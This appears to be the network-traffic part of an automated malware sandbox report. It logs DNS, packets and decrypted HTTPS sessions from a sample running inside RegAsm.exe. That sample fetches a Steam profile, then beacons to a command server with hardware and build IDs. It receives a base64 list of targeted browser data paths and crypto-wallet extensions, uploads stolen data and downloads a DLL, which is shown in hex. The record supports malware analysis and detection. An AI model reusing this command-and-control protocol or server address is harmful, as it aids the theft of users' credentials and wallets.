Mar 28, 2024 20:35:23.891345978 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:23.891417027 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.891668081 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:23.891683102 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.271776915 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.271850109 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.272370100 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.272380114 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.272553921 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.272562981 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.971744061 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.971824884 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.971827030 CET	443	49733	78.46.229.36	192.168.2.6
Mar 28, 2024 20:35:24.971873999 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.971993923 CET	49733	443	192.168.2.6	78.46.229.36
Mar 28, 2024 20:35:24.972012997 CET	443	49733	78.46.229.36	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 28, 2024 20:34:51.327919960 CET	54283	53	192.168.2.6	1.1.1.1
Mar 28, 2024 20:34:51.423953056 CET	53	54283	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 28, 2024 20:34:51.327919960 CET	192.168.2.6	1.1.1.1	0xf5f0	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 28, 2024 20:34:51.423953056 CET	1.1.1.1	192.168.2.6	0xf5f0	No error (0)	steamcommunity.com		104.105.90.131	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

78.46.229.36

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49700	104.105.90.131	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:51 UTC	119	OUT	GET /profiles/76561199658817715 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:52 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 28 Mar 2024 19:34:52 GMT Content-Length: 34657 Connection: close Set-Cookie: sessionid=d8a73308d2e206bcea832dba; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
2024-03-28 19:34:52 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-03-28 19:34:52 UTC	10074	IN	Data Raw: 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 5f 69 6e 73 74 61 Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
2024-03-28 19:34:52 UTC	10081	IN	Data Raw: 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 Data Ascii: :\/\/store.cloudflare.steamstatic.com\/","PUBLIC_SHARED_URL":"https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/","COMMUNITY_BASE_URL":"https:\/\/steamcommunity.com\/","CHAT_BASE_URL":&q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49701	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:52 UTC	218	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:34:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49703	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:53 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:53 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 38 36 39 36 41 45 30 43 32 34 46 34 30 33 33 30 36 30 30 37 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="hwid"B8696AE0C24F4033060071-a33c7340-61ca-11ee-8c18-806e6f6e6963------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------
2024-03-28 19:34:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:34:54 UTC	67	IN	Data Raw: 33 38 0d 0a 31 7c 31 7c 31 7c 30 7c 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 381\|1\|1\|0\|b93a9d4583f59f8e6919c0ee9b16b055\|1\|1\|1\|0\|0\|500000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49706	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:54 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:54 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 47 44 42 41 45 42 46 49 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------FIIEGDBAEBFIIDHJJJEBContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------FIIEGDBAEBFIIDHJJJEBCont
2024-03-28 19:34:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:34:55 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49710	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:55 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:55 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------CGCFBFBGHDGDAKECAKJECont
2024-03-28 19:34:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:34:56 UTC	5165	IN	Data Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49713	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:57 UTC	311	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 6717 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:57 UTC	6717	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 39 33 61 39 64 34 35 38 33 66 35 39 66 38 65 36 39 31 39 63 30 65 65 39 62 31 36 62 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 62 66 66 33 66 34 66 33 38 65 39 62 65 65 61 66 38 65 32 31 35 61 37 36 32 63 38 35 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 Data Ascii: ------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="token"b93a9d4583f59f8e6919c0ee9b16b055------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="build_id"debff3f4f38e9beeaf8e215a762c8549------AEBKECFCFBGCAAKEGIJDCont
2024-03-28 19:34:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 19:34:57 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49714	78.46.229.36	443	5832	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 19:34:58 UTC	226	OUT	GET /sqlm.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 19:34:58 UTC	248	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 19:34:58 GMT Content-Type: application/octet-stream Content-Length: 2459136 Last-Modified: Mon, 25 Mar 2024 09:53:07 GMT Connection: close ETag: "66014983-258600" Accept-Ranges: bytes
2024-03-28 19:34:58 UTC	16136	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-03-28 19:34:58 UTC	16384	IN	Data Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: X~e!*FW\|>\|L1146
2024-03-28 19:34:58 UTC	16384	IN	Data Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
2024-03-28 19:34:58 UTC	16384	IN	Data Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08 Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
